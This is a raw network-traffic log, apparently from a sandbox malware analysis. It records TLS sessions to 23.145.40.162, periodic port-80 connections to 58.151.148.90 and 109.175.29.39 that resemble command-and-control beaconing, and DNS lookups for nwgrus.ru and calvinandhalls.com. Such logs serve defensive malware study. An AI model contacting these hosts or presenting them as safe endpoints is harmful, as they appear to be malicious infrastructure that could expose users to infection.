                                                                      Oct 3, 2024 12:28:56.186989069 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.187021017 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.187203884 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.187268972 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.187381029 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.187438011 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.187463045 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.187468052 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.187490940 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.187522888 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.187522888 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.224724054 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.224783897 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.224848986 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.224872112 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.224899054 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.232047081 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.232069016 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.232130051 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.232146978 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.232175112 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.278124094 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.278156996 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.278250933 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.278320074 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.278354883 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.279002905 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.279025078 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.279043913 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.279072046 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.279092073 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.279117107 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.280246973 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.280267000 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.280317068 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.280333996 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.280359983 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.293705940 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.293752909 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.293806076 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.293833017 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.293855906 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.300966978 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.301142931 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.301181078 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.301256895 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.301294088 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.301340103 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.301373005 CEST49779443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.301389933 CEST4434977923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.364000082 CEST49780443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.364028931 CEST4434978023.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.364093065 CEST49780443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.364360094 CEST49780443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.364368916 CEST4434978023.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.984086037 CEST4434978023.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.984193087 CEST49780443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.985294104 CEST49780443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.985305071 CEST4434978023.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.985975981 CEST4434978023.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:56.986731052 CEST49780443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.986761093 CEST49780443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:56.986764908 CEST4434978023.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:57.278460979 CEST4434978023.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:57.278656960 CEST4434978023.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:57.278747082 CEST49780443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:57.278819084 CEST49780443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:57.278834105 CEST4434978023.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:57.278845072 CEST49780443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:57.278850079 CEST4434978023.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:57.285598993 CEST49781443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:57.285703897 CEST4434978123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:57.285793066 CEST49781443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:57.286006927 CEST49781443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:57.286027908 CEST4434978123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:57.962135077 CEST4434978123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:57.962239027 CEST49781443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:57.963608980 CEST49781443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:57.963641882 CEST4434978123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:57.964413881 CEST4434978123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:57.965574026 CEST49781443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:57.965621948 CEST49781443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:57.965764046 CEST4434978123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:58.240400076 CEST4434978123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:58.240530014 CEST4434978123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:58.240571976 CEST49781443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:58.240648985 CEST4434978123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:58.240700006 CEST49781443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:58.240700006 CEST49781443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:58.240720987 CEST4434978123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:58.240739107 CEST4434978123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:58.244060993 CEST49782443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:58.244107962 CEST4434978223.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:58.244432926 CEST49782443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:58.244674921 CEST49782443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:58.244703054 CEST4434978223.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:58.985193968 CEST4434978223.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:58.985282898 CEST49782443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:58.987214088 CEST49782443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:58.987245083 CEST4434978223.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:58.987612963 CEST4434978223.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:58.988564014 CEST49782443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:58.988604069 CEST49782443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:58.988620043 CEST4434978223.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:59.309488058 CEST4434978223.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:59.309643030 CEST4434978223.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:59.309668064 CEST49782443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:59.309739113 CEST4434978223.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:28:59.309770107 CEST49782443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:28:59.309787035 CEST4434978223.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:29:02.555815935 CEST49783443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:29:02.555851936 CEST4434978323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:29:02.556030989 CEST49783443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:29:02.559638023 CEST49783443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:29:02.559664965 CEST4434978323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:29:03.257486105 CEST4434978323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:29:03.257571936 CEST49783443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:29:03.265636921 CEST49783443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:29:03.265651941 CEST4434978323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:29:03.266042948 CEST4434978323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:29:03.334347010 CEST49783443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:29:03.334391117 CEST49783443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:29:03.334465981 CEST4434978323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:29:03.624571085 CEST4434978323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:29:03.624665022 CEST4434978323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:29:03.625626087 CEST49783443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:29:03.758204937 CEST49783443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:29:03.758229017 CEST4434978323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:29:03.758265972 CEST49783443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:29:03.758275986 CEST4434978323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:29:29.779947042 CEST4978480192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:29.785386086 CEST804978458.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:29.785476923 CEST4978480192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:29.785671949 CEST4978480192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:29.785707951 CEST4978480192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:29.790777922 CEST804978458.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:29.791695118 CEST804978458.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:31.304580927 CEST804978458.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:31.304622889 CEST804978458.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:31.304806948 CEST4978480192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:31.304915905 CEST4978480192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:31.309770107 CEST804978458.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:36.314837933 CEST4978580192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:36.320194960 CEST804978558.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:36.320300102 CEST4978580192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:36.320461988 CEST4978580192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:36.320506096 CEST4978580192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:36.325355053 CEST804978558.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:36.325386047 CEST804978558.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:38.126115084 CEST804978558.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:38.126545906 CEST804978558.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:38.126600981 CEST4978580192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:38.126640081 CEST4978580192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:38.137401104 CEST804978558.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:44.095274925 CEST4978680192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:44.101519108 CEST804978658.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:44.101691961 CEST4978680192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:44.101727009 CEST4978680192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:44.101746082 CEST4978680192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:44.106717110 CEST804978658.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:44.106890917 CEST804978658.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:46.810496092 CEST804978658.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:46.810760975 CEST804978658.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:46.811496973 CEST4978680192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:46.811531067 CEST4978680192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:46.816505909 CEST804978658.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:53.742500067 CEST4978780192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:53.764060974 CEST804978758.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:53.764166117 CEST4978780192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:53.764369011 CEST4978780192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:53.764405012 CEST4978780192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:53.778717995 CEST804978758.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:53.781718016 CEST804978758.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:58.317342043 CEST804978758.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:58.317982912 CEST804978758.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:29:58.318140984 CEST4978780192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:58.318141937 CEST4978780192.168.2.458.151.148.90
                                                                      Oct 3, 2024 12:29:58.323185921 CEST804978758.151.148.90192.168.2.4
                                                                      Oct 3, 2024 12:30:10.969984055 CEST4978880192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:10.974917889 CEST8049788109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:10.975018978 CEST4978880192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:10.975163937 CEST4978880192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:10.975222111 CEST4978880192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:10.980628014 CEST8049788109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:10.980941057 CEST8049788109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:12.094862938 CEST8049788109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:12.094964027 CEST8049788109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:12.094994068 CEST8049788109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:12.095027924 CEST8049788109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:12.095185041 CEST4978880192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:12.095185041 CEST4978880192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:12.095185041 CEST4978880192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:12.095282078 CEST4978880192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:12.342668056 CEST8049788109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:14.304255962 CEST49789443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:14.304307938 CEST4434978923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:14.304368019 CEST49789443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:14.304656029 CEST49789443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:14.304677010 CEST4434978923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:14.897686958 CEST4434978923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:14.897958040 CEST49789443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:14.899064064 CEST49789443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:14.899091959 CEST4434978923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:14.899436951 CEST4434978923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:14.936276913 CEST49789443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:14.936276913 CEST49789443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:14.936496973 CEST4434978923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:15.179527998 CEST4434978923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:15.179635048 CEST4434978923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:15.179725885 CEST49789443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:15.179969072 CEST49789443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:15.179987907 CEST4434978923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:15.180003881 CEST49789443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:15.180011034 CEST4434978923.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:20.001126051 CEST4979080192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:20.006545067 CEST8049790109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:20.006628036 CEST4979080192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:20.006772995 CEST4979080192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:20.006814003 CEST4979080192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:20.011827946 CEST8049790109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:20.011857033 CEST8049790109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:20.785784006 CEST8049790109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:20.786020041 CEST8049790109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:20.786072969 CEST4979080192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:20.786149979 CEST4979080192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:20.790985107 CEST8049790109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:30.522428989 CEST49791443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:30.522542000 CEST4434979123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:30.522648096 CEST49791443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:30.522945881 CEST49791443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:30.522984982 CEST4434979123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:31.939762115 CEST4434979123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:31.939894915 CEST49791443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:31.974206924 CEST49791443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:31.974287987 CEST4434979123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:31.975250959 CEST4434979123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:31.978749037 CEST49791443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:31.978796005 CEST49791443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:31.978940010 CEST4434979123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:32.301404953 CEST4434979123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:32.301784992 CEST4434979123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:32.301841974 CEST49791443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:32.301944971 CEST49791443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:32.301966906 CEST4434979123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:32.301987886 CEST49791443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:32.301995993 CEST4434979123.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:37.642096996 CEST4979280192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:37.647506952 CEST8049792109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:37.647599936 CEST4979280192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:37.647725105 CEST4979280192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:37.647758007 CEST4979280192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:37.652602911 CEST8049792109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:37.652729988 CEST8049792109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:38.457832098 CEST8049792109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:38.459638119 CEST8049792109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:38.459805012 CEST4979280192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:38.459901094 CEST4979280192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:38.464757919 CEST8049792109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:48.977835894 CEST49793443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:48.977900982 CEST4434979323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:48.977972984 CEST49793443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:48.978336096 CEST49793443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:48.978354931 CEST4434979323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:49.575565100 CEST4434979323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:49.575752974 CEST49793443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:49.576826096 CEST49793443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:49.576854944 CEST4434979323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:49.577187061 CEST4434979323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:49.577943087 CEST49793443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:49.577943087 CEST49793443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:49.578048944 CEST4434979323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:49.938839912 CEST4434979323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:49.939022064 CEST4434979323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:49.939169884 CEST49793443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:49.939214945 CEST49793443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:49.939239979 CEST4434979323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:49.939256907 CEST49793443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:30:49.939265013 CEST4434979323.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:30:54.834140062 CEST4979480192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:54.839312077 CEST8049794109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:54.839437962 CEST4979480192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:54.839607954 CEST4979480192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:54.839627981 CEST4979480192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:54.844468117 CEST8049794109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:54.844896078 CEST8049794109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:55.625368118 CEST8049794109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:55.626084089 CEST8049794109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:30:55.626266003 CEST4979480192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:55.626266003 CEST4979480192.168.2.4109.175.29.39
                                                                      Oct 3, 2024 12:30:55.631315947 CEST8049794109.175.29.39192.168.2.4
                                                                      Oct 3, 2024 12:31:07.086177111 CEST49795443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:31:07.086278915 CEST4434979523.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:31:07.086361885 CEST49795443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:31:07.086680889 CEST49795443192.168.2.423.145.40.162
                                                                      Oct 3, 2024 12:31:07.086709976 CEST4434979523.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:31:07.855603933 CEST4434979523.145.40.162192.168.2.4
                                                                      Oct 3, 2024 12:31:07.855705023 CEST49795443192.168.2.423.145.40.162
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 3, 2024 12:27:23.361846924 CEST5766653192.168.2.41.1.1.1
                                                                      Oct 3, 2024 12:27:24.379808903 CEST5766653192.168.2.41.1.1.1
                                                                      Oct 3, 2024 12:27:25.386127949 CEST5766653192.168.2.41.1.1.1
                                                                      Oct 3, 2024 12:27:25.537017107 CEST53576661.1.1.1192.168.2.4
                                                                      Oct 3, 2024 12:27:25.537058115 CEST53576661.1.1.1192.168.2.4
                                                                      Oct 3, 2024 12:27:25.537086964 CEST53576661.1.1.1192.168.2.4
                                                                      Oct 3, 2024 12:28:41.761816025 CEST5476253192.168.2.41.1.1.1
                                                                      Oct 3, 2024 12:28:41.813981056 CEST53547621.1.1.1192.168.2.4
                                                                      Oct 3, 2024 12:30:08.033876896 CEST6294153192.168.2.41.1.1.1
                                                                      Oct 3, 2024 12:30:09.070255995 CEST6294153192.168.2.41.1.1.1
                                                                      Oct 3, 2024 12:30:10.058176041 CEST6294153192.168.2.41.1.1.1
                                                                      Oct 3, 2024 12:30:10.969168901 CEST53629411.1.1.1192.168.2.4
                                                                      Oct 3, 2024 12:30:10.969219923 CEST53629411.1.1.1192.168.2.4
                                                                      Oct 3, 2024 12:30:10.969249010 CEST53629411.1.1.1192.168.2.4
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 3, 2024 12:27:23.361846924 CEST192.168.2.41.1.1.10x6a1cStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:24.379808903 CEST192.168.2.41.1.1.10x6a1cStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.386127949 CEST192.168.2.41.1.1.10x6a1cStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:28:41.761816025 CEST192.168.2.41.1.1.10xf081Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:08.033876896 CEST192.168.2.41.1.1.10x85eeStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:09.070255995 CEST192.168.2.41.1.1.10x85eeStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.058176041 CEST192.168.2.41.1.1.10x85eeStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 3, 2024 12:27:18.638269901 CEST1.1.1.1192.168.2.40xca4eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:18.638269901 CEST1.1.1.1192.168.2.40xca4eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
